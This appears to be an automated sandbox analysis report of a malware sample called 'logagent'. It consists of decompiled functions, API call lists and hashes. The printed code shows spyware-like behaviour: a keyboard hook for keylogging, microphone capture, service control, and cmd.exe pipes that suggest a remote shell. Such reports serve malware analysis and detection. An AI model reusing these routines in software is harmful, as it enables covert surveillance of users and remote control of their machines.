				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				signed int _t36;

				_t38 = __eflags;
				E0040180C(0x41b200, __eflags, _a4);
				__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z( *0x41b1d4);
				_t36 = _a4 << 5;
				_t16 = E0040180C(0x41b200, _t38, _a4);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t28 =  *0x41b1dc; // 0x31f2a00
				 *((intOrPtr*)(_t36 + _t28)) = _t16;
				_t17 =  *0x41b1dc; // 0x31f2a00
				_t29 =  *0x41b1d4; // 0x0
				 *((intOrPtr*)(_t36 + _t17 + 4)) = _t29;
				_t30 =  *0x41b1dc; // 0x31f2a00
				 *((intOrPtr*)(_t36 + _t30 + 8)) = 0;
				_t31 =  *0x41b1dc; // 0x31f2a00
				 *((intOrPtr*)(_t36 + _t31 + 0xc)) = 0;
				_t32 =  *0x41b1dc; // 0x31f2a00
				 *((intOrPtr*)(_t36 + _t32 + 0x10)) = 0;
				_t33 =  *0x41b1dc; // 0x31f2a00
				 *((intOrPtr*)(_t36 + _t33 + 0x14)) = 0;
				_t19 =  *0x41b1dc; // 0x31f2a00
				waveInPrepareHeader( *0x41b198, _t19 + _t36, 0x20);
				_t22 =  *0x41b1dc; // 0x31f2a00
				return waveInAddBuffer( *0x41b198, _t36 + _t22, 0x20);
			}














                                  0x00401181
                                  0x00401196
                                  0x0040119d
                                  0x004011ab
                                  0x004011ae
                                  0x004011b5
                                  0x004011bb
                                  0x004011c3
                                  0x004011c6
                                  0x004011cb
                                  0x004011d1
                                  0x004011d5
                                  0x004011dd
                                  0x004011e1
                                  0x004011e7
                                  0x004011eb
                                  0x004011f1
                                  0x004011f5
                                  0x004011fb
                                  0x004011ff
                                  0x0040120d
                                  0x00401213
                                  0x0040122c

                                  APIs
                                  • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(?,00000000,?,?,0040116A,00000000), ref: 0040119D
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,0040116A,00000000), ref: 004011B5
                                  • waveInPrepareHeader.WINMM(031F2A00,00000020,?,?,0040116A,00000000), ref: 0040120D
                                  • waveInAddBuffer.WINMM(?,00000020,?,?,0040116A,00000000), ref: 00401223
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@wave$?c_str@?$basic_string@?resize@?$basic_string@BufferHeaderPrepare
                                  • String ID:
                                  • API String ID: 1952094867-0
                                  • Opcode ID: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction ID: 8f998c45a3acb3b0b10d37a494ac82bd1c86fe74dd73c150e7a1b96005ae6754
                                  • Opcode Fuzzy Hash: cba3c179512d5eb9509709d99886367f0e09bfaf78f205ade4979b92c6ff8bdb
                                  • Instruction Fuzzy Hash: 83111835600644FFCB159F65EC689E67BE6EB89394702C83DED0A87365DB31A801CBD8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1055476E Relevance: 6.0, APIs: 4, Instructions: 48fileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E1055476E(long _a4, void* _a8) {
				struct _OVERLAPPED* _t15;
				void* _t18;
				long _t19;
				void* _t21;

				_t15 = 0;
				_t21 = CreateFileW(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t21 != 0xffffffff) {
					_t19 = GetFileSize(_t21, 0);
					 *0x41527c(_t19, 0, _t18);
					_a4 = 0;
					if(ReadFile(_t21,  *0x415344(), _t19,  &_a4, 0) != 0) {
						_t15 = 1;
					}
					CloseHandle(_t21);
					return _t15;
				}
				return 0;
			}







                                  0x10554772
                                  0x1055478e
                                  0x10554793
                                  0x105547a5
                                  0x105547a9
                                  0x105547b8
                                  0x105547cc
                                  0x105547ce
                                  0x105547ce
                                  0x105547d1
                                  0x00000000
                                  0x105547d7
                                  0x00000000

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,105435A8,00000000), ref: 10554788
                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,105435A8,00000000), ref: 1055479C
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,?,105435A8,00000000), ref: 105547C3
                                  • CloseHandle.KERNEL32(00000000,?,?,105435A8,00000000), ref: 105547D1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleReadSize
                                  • String ID:
                                  • API String ID: 3919263394-0
                                  • Opcode ID: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction ID: 0afa6314b812f41c72e99e6e8686eca4f1d8cfa4813b39caf91b2e04ad1b8554
                                  • Opcode Fuzzy Hash: fa4d467d17345bb80924ef3185be0a48566cc4f8ae095e8dcd31704ebaf267b8
                                  • Instruction Fuzzy Hash: 4DF08175241518BFE7125F60EC88FEF7F6CEB866A8F108126FD1596290CB704E058AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105530EF Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E105530EF(void* _a4) {
				struct _SERVICE_STATUS _v32;
				int _t10;
				signed int _t16;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x20);
				_t19 = OpenServiceW(_t20,  *0x41532c(), 0x20);
				if(_t19 != 0) {
					_t10 = ControlService(_t19, 1,  &_v32);
					_t21 =  *0x415068;
					_t16 = 0 | _t10 != 0x00000000;
					 *_t21(_t20);
					 *_t21(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				 *0x415350();
				return _t16;
			}









                                  0x105530f8
                                  0x10553109
                                  0x10553119
                                  0x1055311d
                                  0x1055312f
                                  0x10553138
                                  0x1055313e
                                  0x10553141
                                  0x10553144
                                  0x1055311f
                                  0x10553120
                                  0x10553120
                                  0x10553149
                                  0x10553155

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,0041B310,?,?,?,?,?,?,?,10552C0F), ref: 105530FE
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552C0F), ref: 10553113
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552C0F), ref: 10553120
                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,?,10552C0F), ref: 1055312F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction ID: 01ad53eeed1c53c29086dd7888b743c0ac33d0ae929ec59f05dd8de3e33e55d3
                                  • Opcode Fuzzy Hash: f8fd2a6c5f299153eb193c66ec477f5c61babc6e911454b5a8d4cefe462bdfda
                                  • Instruction Fuzzy Hash: 62F04F71510618FFD3106FB4AC88EEF3FACEF89791B448025F90692051DB649D45CAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105531E8 Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E105531E8(void* _a4) {
				struct _SERVICE_STATUS _v32;
				int _t10;
				signed int _t16;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20,  *0x41532c(), 0x40);
				if(_t19 != 0) {
					_t10 = ControlService(_t19, 2,  &_v32);
					_t21 =  *0x415068;
					_t16 = 0 | _t10 != 0x00000000;
					 *_t21(_t20);
					 *_t21(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				 *0x415350();
				return _t16;
			}









                                  0x105531f1
                                  0x10553202
                                  0x10553212
                                  0x10553216
                                  0x10553228
                                  0x10553231
                                  0x10553237
                                  0x1055323a
                                  0x1055323d
                                  0x10553218
                                  0x10553219
                                  0x10553219
                                  0x10553242
                                  0x1055324e

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,10552B88), ref: 105531F7
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552B88), ref: 1055320C
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552B88), ref: 10553219
                                  • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,?,10552B88), ref: 10553228
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction ID: 4e4e0f5da03d1a312dd26725731ec49632a90dbfe484da689e4cb78517a810f1
                                  • Opcode Fuzzy Hash: cb019a389b407e0f39cc257e6cab2f96e1b8a4e5817695bb663befdd35136c94
                                  • Instruction Fuzzy Hash: 8FF04F71500518FFD3106FB5AC89EEF3F6CEF89790F448025FA06A2051DB749D458AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1055324F Relevance: 6.0, APIs: 4, Instructions: 44serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E1055324F(void* _a4) {
				struct _SERVICE_STATUS _v32;
				int _t10;
				signed int _t16;
				void* _t19;
				void* _t20;
				intOrPtr* _t21;

				_t16 = 0;
				_t20 = OpenSCManagerW(0, 0, 0x40);
				_t19 = OpenServiceW(_t20,  *0x41532c(), 0x40);
				if(_t19 != 0) {
					_t10 = ControlService(_t19, 3,  &_v32);
					_t21 =  *0x415068;
					_t16 = 0 | _t10 != 0x00000000;
					 *_t21(_t20);
					 *_t21(_t19);
				} else {
					CloseServiceHandle(_t20);
				}
				 *0x415350();
				return _t16;
			}









                                  0x10553258
                                  0x10553269
                                  0x10553279
                                  0x1055327d
                                  0x1055328f
                                  0x10553298
                                  0x1055329e
                                  0x105532a1
                                  0x105532a4
                                  0x1055327f
                                  0x10553280
                                  0x10553280
                                  0x105532a9
                                  0x105532b5

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,0041B310,?,?,?,?,?,?,?,10552AF7), ref: 1055325E
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,10552AF7), ref: 10553273
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10552AF7), ref: 10553280
                                  • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,?,10552AF7), ref: 1055328F
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseControlHandleManager
                                  • String ID:
                                  • API String ID: 1243734080-0
                                  • Opcode ID: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction ID: 7b2b6ab69fa5ada3766b2f4828e84ea8f738119679e74e6d2ef979ba74d82d8c
                                  • Opcode Fuzzy Hash: b8c97e63606c52034d353a1b2137b25ccf4b96d28f39b7d99feda07d95563afa
                                  • Instruction Fuzzy Hash: 48F04F71500518FFD3106FB4EC88EEF3F6CEF89691F448125FA06A2051DB749E468AE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1055308F Relevance: 6.0, APIs: 4, Instructions: 42serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E1055308F(void* _a4) {
				int _t8;
				signed int _t14;
				void* _t17;
				void* _t18;
				intOrPtr* _t19;

				_t14 = 0;
				_t18 = OpenSCManagerW(0, 0, 0x10);
				_t17 = OpenServiceW(_t18,  *0x41532c(), 0x10);
				if(_t17 != 0) {
					_t8 = StartServiceW(_t17, 0, 0);
					_t19 =  *0x415068;
					_t14 = 0 | _t8 != 0x00000000;
					 *_t19(_t18);
					 *_t19(_t17);
				} else {
					CloseServiceHandle(_t18);
				}
				 *0x415350();
				return _t14;
			}








                                  0x10553095
                                  0x105530a6
                                  0x105530b6
                                  0x105530ba
                                  0x105530c8
                                  0x105530d1
                                  0x105530d7
                                  0x105530da
                                  0x105530dd
                                  0x105530bc
                                  0x105530bd
                                  0x105530bd
                                  0x105530e2
                                  0x105530ee

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,0041B310,?,?,10552C9C), ref: 1055309B
                                  • OpenServiceW.ADVAPI32(00000000,00000000,?,?,10552C9C), ref: 105530B0
                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,10552C9C), ref: 105530BD
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,10552C9C), ref: 105530C8
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Service$Open$CloseHandleManagerStart
                                  • String ID:
                                  • API String ID: 2553746010-0
                                  • Opcode ID: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction ID: 43a04c1309c32b1a87a003e115f535fc87dfd98479afb45fd1b81f2c981e4967
                                  • Opcode Fuzzy Hash: 0cc14d108f04878674a6d267668b74455fb6495d903e3efe619db27e090fbd46
                                  • Instruction Fuzzy Hash: 23F06D71100628FFD3106BB5EC8CDEF7FACEF893A4B048425F90993160DB648D459AE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004052D5 Relevance: 6.0, APIs: 4, Instructions: 38windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E004052D5(intOrPtr* __ecx) {
				struct tagMSG _v32;
				intOrPtr* _t14;

				_t14 = __ecx;
				 *0x41b9a8 = __ecx;
				if( *__ecx != 0) {
					L3:
					if(GetMessageA( &_v32, 0, 0, 0) != 0) {
						TranslateMessage( &_v32);
						DispatchMessageA( &_v32);
						goto L2;
					}
				} else {
					 *_t14 = SetWindowsHookExA(0xd, E004052BA, 0, 0);
					L2:
					if( *_t14 != 0) {
						goto L3;
					}
				}
				return 0;
			}





                                  0x004052dd
                                  0x004052e1
                                  0x004052e9
                                  0x00405300
                                  0x0040530f
                                  0x00405315
                                  0x0040531f
                                  0x00000000
                                  0x0040531f
                                  0x004052eb
                                  0x004052fa
                                  0x004052fc
                                  0x004052fe
                                  0x00000000
                                  0x00000000
                                  0x004052fe
                                  0x0040532c

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Message$DispatchHookTranslateWindows
                                  • String ID:
                                  • API String ID: 1978648212-0
                                  • Opcode ID: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction ID: 3f8d98675bb246c8319de4d6d7df696f93bc8797274e956dc3fa59b7a05fdffb
                                  • Opcode Fuzzy Hash: 52272d776155f8ea9757c9a67d2815f13097f215008760f7cfa802aa42738574
                                  • Instruction Fuzzy Hash: 5DF03071900A05EBC7205FA6AC0CEDBBBFCEBD5B42B50443EA885E2190E6788441CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 105544D9 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                  Download Yara Rule
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000,1054B4C8,00415208), ref: 105544ED
                                  • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 1055450D
                                  • CloseHandle.KERNEL32(00000000), ref: 10554518
                                  • CloseHandle.KERNEL32(00000000), ref: 10554529
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
                                  • Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle$FileModuleNameOpenProcess
                                  • String ID:
                                  • API String ID: 3706008839-0
                                  • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction ID: ab28cffcd80e565fae20a232256bb9ea5d9173a701e6cd5beeadd5fece462388
                                  • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                  • Instruction Fuzzy Hash: 3CF04F75640619FBDB119F90DC49FDA3FACEB48746F008122F949DA190EF70EA448F94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040B5A2 Relevance: 6.0, APIs: 4, Instructions: 37registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 18%
                                  			E0040B5A2(intOrPtr _a4, void* _a8, short* _a12, char _a15, short* _a16) {
				int _v8;
				char _v2056;

				_v8 = 0x400;
				if(RegOpenKeyExW(_a8, _a12, 0, 0x20019,  &_a8) != 0) {
					_push( &_a15);
					_push(0x415800);
				} else {
					RegQueryValueExW(_a8, _a16, 0, 0,  &_v2056,  &_v8);
					RegCloseKey(_a8);
					_push( &_a15);
					_push( &_v2056);
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z();
				return _a4;
			}





                                  0x0040b5ae
                                  0x0040b5cb
                                  0x0040b601
                                  0x0040b602
                                  0x0040b5cd
                                  0x0040b5e2
                                  0x0040b5eb
                                  0x0040b5f4
                                  0x0040b5fb
                                  0x0040b5fb
                                  0x0040b60a
                                  0x0040b614

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                  • RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                  • RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@CloseG@1@@G@2@@std@@G@std@@OpenQueryU?$char_traits@Value
                                  • String ID:
                                  • API String ID: 4081865614-0
                                  • Opcode ID: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction ID: 08c4fdd74f089b672de4800a8e1209c34edbbd410ac70e3f0c9e675f1f7a205c
                                  • Opcode Fuzzy Hash: fb7ef9b6539aba75acc45a89fbd2bb87bc1b0fcb06b4154e7f789d8a22b8fd0a
                                  • Instruction Fuzzy Hash: 3D01F67554010EFFDB11DF90ED45FDA7BBCFB08304F508062BA05AA1A0D770AA199B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D87E Relevance: 6.0, APIs: 4, Instructions: 32COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040D87E() {
				char _t9;
				void* _t22;
				void* _t28;
				intOrPtr _t29;

				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(E0040180C(_t22 - 0x10, _t28, 1));
				_t29 =  *0x41b889; // 0x0
				if(_t29 == 0) {
					_t9 = E0040180C(_t22 - 0x10, _t29, 0);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E00402B8A(_t9);
				}
				E004017DD(_t22 - 0x10);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}







                                  0x0040d88e
                                  0x0040d896
                                  0x0040d89c
                                  0x0040d8a6
                                  0x0040d8b1
                                  0x0040d8b7
                                  0x0040e597
                                  0x0040e6a4
                                  0x0040e6ac
                                  0x0040e6b5
                                  0x0040e6c1

                                  APIs
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000001), ref: 0040D88E
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D8B1
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BDC
                                    • Part of subcall function 00402B8A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00402BFB
                                    • Part of subcall function 00402B8A: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B860,cmd.exe), ref: 00402C1F
                                    • Part of subcall function 00402B8A: getenv.MSVCRT ref: 00402C34
                                    • Part of subcall function 00402B8A: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00402C3E
                                    • Part of subcall function 00402B8A: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415774), ref: 00402C4B
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B7A0,0041B870,0041B7F0,00000000), ref: 00402C81
                                    • Part of subcall function 00402B8A: CreatePipe.KERNEL32(0041B858,0041B874,0041B7F0,00000000), ref: 00402C9B
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0041B7A8,0041B878), ref: 00402CF2
                                    • Part of subcall function 00402B8A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402D06
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@V01@$??1?$basic_string@??4?$basic_string@?c_str@?$basic_string@CreateD@1@@PipeV01@@$??8std@@D@2@@0@V?$basic_string@Y?$basic_string@getenv
                                  • String ID:
                                  • API String ID: 187635395-0
                                  • Opcode ID: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction ID: 95a58a3f9309c0e5762bae13ef1d8417c4b6d23d487987f94e594afc93633c1a
                                  • Opcode Fuzzy Hash: 450a3559cbae69685aa4108714fcfe19e1a758c696523a106c3012aef2761bb0
                                  • Instruction Fuzzy Hash: 22F03A7191011CCBD704BBA6ECA99EE7B34EB64355B404C3BE412A20E1EBB90525CA5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041358B Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                  Download Yara Rule
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040969A,?,?), ref: 0041359B
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,0040969A,?,?), ref: 004135B2
                                    • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135CA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040969A,?,?), ref: 004135D3
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
